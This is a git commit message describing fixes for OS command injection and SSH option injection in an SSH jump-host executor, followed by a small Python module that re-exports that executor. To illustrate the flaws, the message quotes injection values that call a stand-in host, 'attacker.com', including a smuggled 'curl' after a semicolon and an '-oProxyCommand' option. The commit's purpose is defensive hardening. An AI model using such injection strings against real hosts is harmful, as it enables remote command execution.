Issues fixed: 1. [HIGH] OS Command Injection in execute_command() (CWE-78) command was accepted as a string and passed as the final SSH positional arg. Remote SSH executes it via sh -c, so shell metacharacters in command (semicolons, pipes, backticks) are interpreted. e.g. command="id; curl attacker.com" → two commands execute on target. Fix: command parameter changed to List[str]; TypeError raised if str is passed; SSH cmd built with ['--, *command] so remote shell sees argv, not a shell string. '--' stops SSH from interpreting options. 2. [HIGH] SSH Option Injection via host/user parameters (CWE-88) jump_host, target_host, jump_user, target_user were unsanitized. Attacker-controlled host like "-oProxyCommand=curl attacker.com #" could inject SSH options. Fix: _validate_host() / _validate_user() with strict regex on init and in execute_command(); ValueError raised on invalid input. 3. [BUG] AutoHealService.handle_exception() did not exist elephant_alpha_autonomous_engine.py imports and calls AutoHealService().handle_exception() — this would raise AttributeError at runtime. AutoHealService is now fully implemented: - Playbook lookup from DB (autoheal_models.Playbook) - ALLOWED_ACTION_TYPES allowlist (DOCKER_RESTART/WAIT_RETRY/ALERT_ONLY/SSH_CMD) - DOCKER_RESTART: static ['docker','restart',<validated_container>] - SSH_CMD: requires action_params.argv as list; host/user validated 4. [DESIGN] Duplicate SSHJumpExecutor across two files auto_heal_service.py and openclaw_strategist_service.py were byte-for- byte copies. Single source of truth now in auto_heal_service.py; openclaw_strategist_service.py re-exports SSHJumpExecutor. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
32 lines
1.0 KiB
Python
32 lines
1.0 KiB
Python
"""
|
||
openclaw_strategist_service.py
|
||
OpenClaw 戰略分析師服務。
|
||
|
||
re-export SSHJumpExecutor from auto_heal_service(唯一來源)
|
||
以及 OpenClaw 策略分析功能。
|
||
"""
|
||
import logging
|
||
from typing import Optional, Any
|
||
|
||
logger = logging.getLogger(__name__)
|
||
|
||
# SSHJumpExecutor 統一維護於 auto_heal_service,此處 re-export 向後相容
|
||
from services.auto_heal_service import SSHJumpExecutor # noqa: F401
|
||
|
||
__all__ = ["SSHJumpExecutor", "generate_weekly_strategy_report"]
|
||
|
||
|
||
def generate_weekly_strategy_report(context: Optional[Any] = None) -> dict:
|
||
"""
|
||
OpenClaw 週報生成(戰略分析)。
|
||
當 ElephantAlpha orchestrator 分派 openclaw generate_market_analysis 時呼叫。
|
||
"""
|
||
logger.info("[OpenClaw] generate_weekly_strategy_report called")
|
||
# TODO: 接入 OpenClaw LLM 生成真實週報
|
||
return {
|
||
"status": "ok",
|
||
"report_type": "weekly_strategy",
|
||
"summary": "OpenClaw strategy report placeholder — LLM integration pending",
|
||
"context": context,
|
||
}
|